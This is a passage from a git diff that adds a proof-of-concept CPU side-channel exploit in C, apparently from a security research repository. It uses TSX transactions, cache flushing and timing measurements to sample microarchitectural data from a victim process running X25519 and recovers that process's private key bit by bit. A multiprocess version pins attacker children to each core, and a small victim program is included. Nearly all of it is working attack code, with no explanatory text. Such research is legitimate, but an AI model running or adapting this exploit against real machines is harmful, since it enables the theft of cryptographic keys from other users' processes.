+#include <unistd.h>
+#include <syscall.h>
+#include <linux/mman.h>
+
+
+
+#define MEMSZ (256*512 * 100)
+
+#define CACHE_MISS 100
+
+static inline __attribute__((always_inline)) int is_cached(void *ptr1) {
+  uint32_t diff;
+  asm volatile (
+      //"cpuid\n\t"
+      "mfence\n\t"
+      "lfence\n\t"
+      "RDTSC\n\t"
+      "mov rbx, rax\n\t"
+      "mov rdx, [%1]\n\t"
+      "RDTSCP\n\t"
+      "lfence\n\t"
+      "sub rax, rbx\n\t"
+      "mov %0, eax\n\t"
+
+      : "=b" (diff)
+      : "S"(ptr1)
+      : "rax", "rcx", "rdx");
+
+  return diff < CACHE_MISS;
+}
+
+const unsigned long probe1_addr = 0x7895e4000;
+char *probe1 = (char*) probe1_addr;
+const unsigned long probe3_addr = 0x560000000;
+char *probe3 = (char*) probe3_addr;
+
+
+static int mlpds(unsigned long prefix) {
+  prefix ^= probe1_addr;
+  _mm_clflush(probe1);
+  _mm_mfence();
+  _mm_sfence();
+  _mm_lfence();
+  asm volatile("CPUID"::: "eax","ebx","ecx","edx", "memory");
+
+
+  // TODO find optimal number of iterations.
+  for (int i = 0; i < 32; i++) {
+  asm volatile(
+      ".align 64\n\t"
+      "0:\n\t"
+      "clflush [%0]\n\t"
+      "sfence\n\t"
+      // idk why, helps speed up
+      "xbegin 2f\n\t"
+
+      //xbegin block:
+      "mov   rax, [-1]\n\t"
+      "xor   rax, %1\n\t"
+      "prefetchnta [rax]\n"
+
+      "xend\n\t"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "3: jmp 3b\n"
+      "2:\n\t"
+      //"dec r15\n\t"
+      //"jne 0b\n\t"
+      :
+      : "r" (probe3), "r"(prefix)
+      : "rax");
+  }
+
+  int p1 = is_cached(probe1);
+  if (p1) { return 0; }
+  return -1;
+}
+
+
+void map() {
+  if (mmap(probe1, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe1) {
+    err(1, "mmap(probe1)");
+  }
+  memset(probe1, 0x99, 4096);
+  if (mmap(probe3, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe3) {
+    err(1, "mmap(probe3)");
+  }
+  memset(probe3, 0x99, 4096);
+}
+
+void print_secret(unsigned char* secret) {
+  printf("Secret:");
+  for (int i = 0; i < 32; i++) {
+    printf(" %02x", secret[i]);
+  }
+  printf("\n");
+}
+
+void set_bit(uint8_t* privkey, int bit, int to) {
+  if (bit < 0) return;
+  privkey[bit / 8] &= ~(1 << (bit & 7));
+  privkey[bit / 8] |= to << (bit & 7);
+}
+
+int X25519_fake(uint8_t* out, const uint8_t* privkey,
+                const uint8_t* peer_pubkey, int iteration);
+
+void X25519_public_from_private(uint8_t out_public_value[32],
+                                const uint8_t private_key[32]);
+
+void stage3(size_t secret_offset, size_t saved_rbp) {
+  uint8_t pubkey[32];
+  uint8_t client_privkey[32];
+  printf("Input client private key:\n");
+  for (int i = 0; i < 32; i++) {
+    unsigned int n;
+    scanf("%x", &n);
+    client_privkey[i] = n;
+  }
+  X25519_public_from_private(pubkey, client_privkey);
+  for (int i = 0; i < 32; i++) {
+    printf("%02x ", client_privkey[i]);
+  }
+  printf("\n");
+  for (int i = 0; i < 32; i++) {
+    printf("%02x ", pubkey[i]);
+  }
+  printf("\n");
+  uint8_t privkey[32] = {0};
+  privkey[31] &= 127;
+  privkey[31] |= 64;
+  uint8_t out[40];
+  // The algorithm starts at that iteration.
+  int start_iteration = 253;
+
+  // Check if checkpoint available.
+  FILE* f = fopen("/tmp/checkpoint", "r");
+  if (!f) {
+    printf("Starting from scratch.\n");
+  }
+  else {
+    printf("Starting from checkpoint.\n");
+    fscanf(f, "%d", &start_iteration);
+    for (int i = 0; i < 32; i++) {
+      unsigned int n;
+      fscanf(f, "%x", &n);
+      privkey[i] = n;
+    }
+    fclose(f);
+  }
+
+  print_secret(privkey);
+
+#define MARGIN 3
+
+  // Ending on iteration 3, since bits 2, 1 and 0 are unset.
+  for (int iteration = start_iteration; iteration >= 3; iteration--) {
+    unsigned short results[4][5] = {0};
+    size_t poss[4][5] = {};
+
+    // iteration - 2 if you want to look at two bits.
+    // iteration - 1 if you want to look at one bit.
+    int x_it = iteration - 1;
+    if (x_it < 0) x_it = 0;
+
+    for (int which_qword = 0; which_qword < 5; which_qword++) {
+      set_bit(privkey, iteration, 0);
+      set_bit(privkey, iteration-1, 0);
+      X25519_fake(out, privkey, pubkey, x_it);
+      poss[0][which_qword] = ((size_t*)out)[which_qword];
+
+      set_bit(privkey, iteration, 0);
+      set_bit(privkey, iteration-1, 1);
+      X25519_fake(out, privkey, pubkey, x_it);
+      poss[1][which_qword] = ((size_t*)out)[which_qword];
+
+      set_bit(privkey, iteration, 1);
+      set_bit(privkey, iteration-1, 0);
+      X25519_fake(out, privkey, pubkey, x_it);
+      poss[2][which_qword] = ((size_t*)out)[which_qword];
+
+      set_bit(privkey, iteration, 1);
+      set_bit(privkey, iteration-1, 1);
+      X25519_fake(out, privkey, pubkey, x_it);
+      poss[3][which_qword] = ((size_t*)out)[which_qword];
+    }
+
+    printf("iter=%d\nTargets:\n", iteration);
+    for (int i = 0; i < 5; i++) {
+      for (int j = 0; j < 4; j++) {
+        printf("%016llx ", poss[j][i]);
+      }
+      printf("\n");
+    }
+    int diff_abs;
+    int bit;
+    do {
+      for (int times = 0; times < 20000; times++) {
+        for (int k = 0; k < 4; k++) {
+          for (int wq = 0; wq < 5; wq++) {
+            int byte = mlpds(poss[k][wq]);
+            if (byte != -1) {
+              // Oddly enough, this printf is sometimes necessary... Otherwise exploit
+              // occasionally breaks.
+              //printf("res: %d\n", byte);
+              results[k][wq]++;
+            }
+          }
+        }
+      }
+      //diff = 0;
+      //int plus = 0;
+      //int minus = 0;
+      int sums[4] = {0};
+      for (int wq = 0; wq < 5; wq++) {
+        for (int ij = 0; ij < 4; ij++) {
+          sums[ij] += results[ij][wq];
+        }
+        //diff += results[0][wq] + results[1][wq] - results[2][wq] - results[3][wq];
+        //plus += results[0][wq] + results[1][wq];
+        //minus += results[2][wq] + results[3][wq];
+        printf("%d %d | %d %d\n", results[0][wq], results[1][wq], results[2][wq], results[3][wq]);
+      }
+
+#if 1
+      //version for iteration - 1
+      int x0 = sums[0] + sums[1];
+      int x1 = sums[2] + sums[3];
+      diff_abs = x0 - x1;
+      if (diff_abs < 0) diff_abs = -diff_abs;
+      bit = x1 > x0;
+      printf("--- diff_abs %d (%d vs. %d, total %d)\n", diff_abs, x0, x1, x0+x1);
+#else
+      //version for iteration - 2
+      int top = -1, topind = -1, top2 = -1, top2ind = -1;
+      for (int ij = 0; ij < 4; ij++) {
+        if (sums[ij] > top) {
+          top2 = top;
+          top2ind = topind;
+          top = sums[ij];
+          topind = ij;
+        }
+        else if (sums[ij] > top2) {
+          top2 = sums[ij];
+          top2ind = ij;
+        }
+      }
+      diff_abs = top - top2;
+      bit = topind >= 2;
+      printf("--- diff_abs %d (top1 %d vs. top2 %d vs. total %d)\n", diff_abs, top, top2, sums[0]+sums[1]+sums[2]+sums[3]);
+#endif
+    } while (diff_abs < MARGIN);
+    set_bit(privkey, iteration-1, 0);
+    set_bit(privkey, iteration, bit);
+    /*
+    if (diff < 0) {
+      set_bit(privkey, iteration, 1);
+    }
+    else {
+      set_bit(privkey, iteration, 0);
+    }
+    */
+    print_secret(privkey);
+  }
+  privkey[0] &= 248;
+  print_secret(privkey);
+}
+
+void run() {
+  map();
+
+  stage3(0, 0);
+}
+
+int main() {
+  run();
+
+  return 0;
+}
+
diff --git a/pocs/cpus/mds-x25519/leak_multiprocess.c b/pocs/cpus/mds-x25519/leak_multiprocess.c
new file mode 100644
index 00000000..a216ea3c
--- /dev/null
+++ b/pocs/cpus/mds-x25519/leak_multiprocess.c
@@ -0,0 +1,368 @@
+#define _GNU_SOURCE
+#include <stdio.h>
+#include <sys/wait.h>
+#include <sched.h>
+#include <stdlib.h>
+#include <signal.h>
+#include <fcntl.h>
+#include <memory.h>
+#include <sys/mman.h>
+#include <immintrin.h>
+#include <err.h>
+#include <stdint.h>
+#include <unistd.h>
+#include <syscall.h>
+#include <linux/mman.h>
+#include <errno.h>
+
+
+
+
+#define MEMSZ (256*512 * 100)
+
+#define CACHE_MISS 100
+
+static inline __attribute__((always_inline)) int is_cached(void *ptr1) {
+  uint32_t diff;
+  asm volatile (
+      //"cpuid\n\t"
+      "mfence\n\t"
+      "lfence\n\t"
+      "RDTSC\n\t"
+      "mov rbx, rax\n\t"
+      "mov rdx, [%1]\n\t"
+      "RDTSCP\n\t"
+      "lfence\n\t"
+      "sub rax, rbx\n\t"
+      "mov %0, eax\n\t"
+
+      : "=b" (diff)
+      : "S"(ptr1)
+      : "rax", "rcx", "rdx");
+
+  return diff < CACHE_MISS;
+}
+
+const unsigned long probe1_addr = 0x7895e4000;
+char *probe1 = (char*) probe1_addr;
+const unsigned long probe3_addr = 0x560000000;
+char *probe3 = (char*) probe3_addr;
+
+
+static int mlpds(unsigned long prefix) {
+  prefix ^= probe1_addr;
+  _mm_clflush(probe1);
+  _mm_mfence();
+  _mm_sfence();
+  _mm_lfence();
+  asm volatile("CPUID"::: "eax","ebx","ecx","edx", "memory");
+
+
+  // TODO find optimal number of iterations.
+  for (int i = 0; i < 32; i++) {
+  asm volatile(
+      ".align 64\n\t"
+      "0:\n\t"
+      "clflush [%0]\n\t"
+      "sfence\n\t"
+      // idk why, helps speed up
+      "xbegin 2f\n\t"
+
+      //xbegin block:
+      "mov   rax, [-1]\n\t"
+      "xor   rax, %1\n\t"
+      "prefetchnta [rax]\n"
+
+      "xend\n\t"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "nop\nnop\nnop\nnop\nnop\n"
+      "3: jmp 3b\n"
+      "2:\n\t"
+      //"dec r15\n\t"
+      //"jne 0b\n\t"
+      :
+      : "r" (probe3), "r"(prefix)
+      : "rax");
+  }
+
+  int p1 = is_cached(probe1);
+  if (p1) { return 0; }
+  return -1;
+}
+
+
+void map() {
+  if (mmap(probe1, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe1) {
+    err(1, "mmap(probe1)");
+  }
+  memset(probe1, 0x99, 4096);
+  if (mmap(probe3, 4096, PROT_READ|PROT_WRITE, MAP_FIXED|MAP_ANONYMOUS|MAP_PRIVATE, -1, 0) != probe3) {
+    err(1, "mmap(probe3)");
+  }
+  memset(probe3, 0x99, 4096);
+}
+
+void print_secret(unsigned char* secret) {
+  printf("Secret:");
+  for (int i = 0; i < 32; i++) {
+    printf(" %02x", secret[i]);
+  }
+  printf("\n");
+}
+
+void set_bit(uint8_t* privkey, int bit, int to) {
+  if (bit < 0) return;
+  privkey[bit / 8] &= ~(1 << (bit & 7));
+  privkey[bit / 8] |= to << (bit & 7);
+}
+
+int X25519_fake(uint8_t* out, const uint8_t* privkey,
+                const uint8_t* peer_pubkey, int iteration);
+
+void X25519_public_from_private(uint8_t out_public_value[32],
+                                const uint8_t private_key[32]);
+
+#define MARGIN 3
+#define CPU_NUM 6
+
+size_t poss[4][5];
+
+void do_kill(int pid) {
+  kill(pid, SIGKILL);
+  waitpid(pid, NULL, 0);
+}
+
+void run_child(void* shmem) {
+  map();
+  unsigned short* results = (unsigned short*) shmem;
+  while (1) {
+    for (int k = 0; k < 4; k++) {
+      for (int wq = 0; wq < 5; wq++) {
+        int byte = mlpds(poss[k][wq]);
+        if (byte != -1) {
+          results[k * 5 + wq]++;
+          printf("[pid %d] res: %d for [%d][%d]\n", getpid(), byte, k, wq);
+        }
+      }
+    }
+  }
+}
+
+int fork_children(int* pids, int* affin, void* shmem) {
+  int count = 0;
+  for (int i = 0; i < CPU_NUM; i++) {
+    int pid = fork();
+    if (pid == -1) {
+      err(1, "could not fork");
+    }
+    if (pid == 0) {
+      run_child(shmem);
+    }
+    pids[count] = pid;
+    affin[count] = i;
+    cpu_set_t set;
+    CPU_ZERO(&set);
+    CPU_SET(i, &set);
+    int error = sched_setaffinity(pid, sizeof(set), &set);
+    if (error) {
+      if (errno == EINVAL) {
+        do_kill(pid);
+        printf("Affinity %d does not work, killing temporary process.\n", i);
+      }
+      else {
+        printf("err %d\n", error);
+        err(1, "sched_setaffinity");
+      }
+    }
+    else {
+      printf("Created new child, pid = %d, affinity = core %d\n", pid, i);
+      count++;
+    }
+  }
+  return count;
+}
+
+int affinity_valid(int pid, int aff) {
+  cpu_set_t set;
+  if (sched_getaffinity(pid, sizeof(set), &set) < 0) {
+    err(1, "sched_getaffinity");
+  }
+  return CPU_COUNT(&set) == 1 && CPU_ISSET(aff, &set);
+}
+
+void do_iteration(int iteration, uint8_t* privkey, uint8_t* pubkey) {
+  uint8_t out[40];
+  unsigned short results[4][5] = {0};
+
+  // iteration - 2 if you want to look at two bits.
+  // iteration - 1 if you want to look at one bit.
+  int x_it = iteration - 1;
+  if (x_it < 0) x_it = 0;
+
+  for (int which_qword = 0; which_qword < 5; which_qword++) {
+    set_bit(privkey, iteration, 0);
+    set_bit(privkey, iteration-1, 0);
+    X25519_fake(out, privkey, pubkey, x_it);
+    poss[0][which_qword] = ((size_t*)out)[which_qword];
+
+    set_bit(privkey, iteration, 0);
+    set_bit(privkey, iteration-1, 1);
+    X25519_fake(out, privkey, pubkey, x_it);
+    poss[1][which_qword] = ((size_t*)out)[which_qword];
+
+    set_bit(privkey, iteration, 1);
+    set_bit(privkey, iteration-1, 0);
+    X25519_fake(out, privkey, pubkey, x_it);
+    poss[2][which_qword] = ((size_t*)out)[which_qword];
+
+    set_bit(privkey, iteration, 1);
+    set_bit(privkey, iteration-1, 1);
+    X25519_fake(out, privkey, pubkey, x_it);
+    poss[3][which_qword] = ((size_t*)out)[which_qword];
+  }
+
+  printf("iter=%d\nTargets:\n", iteration);
+  for (int i = 0; i < 5; i++) {
+    for (int j = 0; j < 4; j++) {
+      printf("%016llx ", poss[j][i]);
+    }
+    printf("\n");
+  }
+  int diff_abs = 0;
+  int bit;
+  int num_children = 0;
+  int pids[1024];
+  int affin[1024];
+  void* shmem;
+  shmem = mmap(NULL, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, -1, 0);
+  if (shmem == MAP_FAILED) {
+    err(1, "shared memory alloc failed");
+  }
+
+  do {
+    if (num_children == 0) {
+      num_children = fork_children(pids, affin, shmem);
+      memset(shmem, 0, sizeof(results));
+      usleep(100 * 1000);
+    }
+    memset(shmem, 0, sizeof(results));
+    usleep(100 * 1000);
+    unsigned short results_temp[4][5] = {0};
+    memcpy(results_temp, shmem, sizeof(results_temp));
+    memset(shmem, 0, sizeof(results));
+    int all_good = 1;
+    for (int i = 0; i < num_children; i++) {
+      all_good &= affinity_valid(pids[i], affin[i]);
+    }
+    if (all_good) {
+      for (int wq = 0; wq < 5; wq++) {
+        for (int ij = 0; ij < 4; ij++) {
+          results[ij][wq] += results_temp[ij][wq];
+        }
+      }
+
+      int sums[4] = {0};
+      for (int wq = 0; wq < 5; wq++) {
+        for (int ij = 0; ij < 4; ij++) {
+          sums[ij] += results[ij][wq];
+        }
+        printf("%d %d | %d %d\n", results[0][wq], results[1][wq], results[2][wq], results[3][wq]);
+      }
+
+      int x0 = sums[0] + sums[1];
+      int x1 = sums[2] + sums[3];
+      diff_abs = x0 - x1;
+      if (diff_abs < 0) diff_abs = -diff_abs;
+      bit = x1 > x0;
+      printf("--- diff_abs %d (%d vs. %d, total %d)\n", diff_abs, x0, x1, x0+x1);
+    }
+    else {
+      printf("Killing children - affinity changed.\n");
+      for (int i = 0; i < num_children; i++) {
+        do_kill(pids[i]);
+      }
+      num_children = 0;
+    }
+  } while (diff_abs < MARGIN);
+  printf("Killing children as we leaked the bit.\n");
+  for (int i = 0; i < num_children; i++) {
+    do_kill(pids[i]);
+  }
+  set_bit(privkey, iteration-1, 0);
+  set_bit(privkey, iteration, bit);
+  print_secret(privkey);
+}
+
+void stage3(size_t secret_offset, size_t saved_rbp) {
+  uint8_t pubkey[32];
+  uint8_t client_privkey[32];
+  printf("Input client private key:\n");
+  for (int i = 0; i < 32; i++) {
+    unsigned int n;
+    scanf("%x", &n);
+    client_privkey[i] = n;
+  }
+  X25519_public_from_private(pubkey, client_privkey);
+  uint8_t privkey[32] = {0};
+  privkey[31] &= 127;
+  privkey[31] |= 64;
+  // The algorithm starts at that iteration.
+  int start_iteration = 253;
+
+  // Check if checkpoint available.
+  FILE* f = fopen("/tmp/checkpoint", "r");
+  if (!f) {
+    printf("Starting from scratch.\n");
+  }
+  else {
+    printf("Starting from checkpoint.\n");
+    fscanf(f, "%d", &start_iteration);
+    for (int i = 0; i < 32; i++) {
+      unsigned int n;
+      fscanf(f, "%x", &n);
+      privkey[i] = n;
+    }
+    fclose(f);
+  }
+
+  print_secret(privkey);
+
+  // Ending on iteration 3, since bits 2, 1 and 0 are unset.
+  for (int iteration = start_iteration; iteration >= 3; iteration--) {
+    do_iteration(iteration, privkey, pubkey);
+  }
+  privkey[0] &= 248;
+  print_secret(privkey);
+}
+
+void run() {
+  stage3(0, 0);
+}
+
+int main() {
+  run();
+
+  return 0;
+}
+
diff --git a/pocs/cpus/mds-x25519/x25519_victim.c b/pocs/cpus/mds-x25519/x25519_victim.c
new file mode 100644
index 00000000..30de7045
--- /dev/null
+++ b/pocs/cpus/mds-x25519/x25519_victim.c
@@ -0,0 +1,24 @@
+#include <stdint.h>
+#include <stdio.h>
+
+int X25519(uint8_t out_shared_key[32],
+           const uint8_t private_key[32],
+           const uint8_t peer_public_value[32]);
+void X25519_public_from_private(uint8_t out_public_value[32],
+                                const uint8_t private_key[32]);
+
+int main() {
+  const uint8_t* priv = (const uint8_t*)"privtest12345678somemorebitsABCD";
+  uint8_t clientpriv[32] = {1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,
+                            17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32};
+  uint8_t pub[32];
+  X25519_public_from_private(pub, clientpriv);
+  for (int i = 0; i < 32; i++) {
+    printf("%02x ", pub[i]);
+  }
+  printf("\n");
+  uint8_t out[32];
+  while (1) {
+    X25519(out, priv, pub);
+  }
+}